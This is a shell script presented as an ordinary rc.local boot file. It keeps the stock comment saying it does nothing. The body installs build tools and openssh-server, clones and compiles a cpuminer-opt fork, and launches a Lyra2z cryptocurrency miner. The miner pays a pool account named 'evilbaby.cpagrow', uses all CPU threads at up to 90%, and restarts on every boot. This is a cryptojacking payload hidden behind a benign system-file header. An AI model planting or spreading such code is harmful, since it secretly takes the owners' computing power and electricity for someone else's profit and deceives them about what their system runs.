#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
if [ -f ${PWD}/cpuminer-opt/miner.h ]; then
    if pgrep -x "cpuminer" > /dev/null
then
    echo "minerd is running"
else

echo "minerd has been installed, starting now"
sudo sysctl -w vm.nr_hugepages=$((`grep -c ^processor /proc/cpuinfo` * 3))
cd cpuminer-opt
		
./cpuminer -a lyra2z -o stratum+tcp://us-east.lyra2z-hub.miningpoolhub.com:20581 -u evilbaby.cpagrow -p 1 --thread=$((`cat /proc/cpuinfo | grep processor | wc -l`)); sleep 3
cpulimit --exe cpuminer --limit 90
     
fi
exit
fi

sudo apt-get update
sudo apt-get install -y git make curl unzip gedit automake autoconf dh-autoreconf build-essential pkg-config openssh-server screen libtool libcurl4-openssl-dev libncurses5-dev libudev-dev libjansson-dev libssl-dev libgmp-dev gcc g++ cpulimit screen
sudo sysctl -w vm.nr_hugepages=$((`grep -c ^processor /proc/cpuinfo` * 3))
git clone https://github.com/evilbaby/cpuminer-opt
cd cpuminer-opt
./build.sh
echo "minerd is starting"

./cpuminer -a lyra2z -o stratum+tcp://us-east.lyra2z-hub.miningpoolhub.com:20581 -u evilbaby.cpagrow -p 1 --thread=$((`cat /proc/cpuinfo | grep processor | wc -l`)); sleep 3
cpulimit --exe cpuminer --limit 90
exit 0
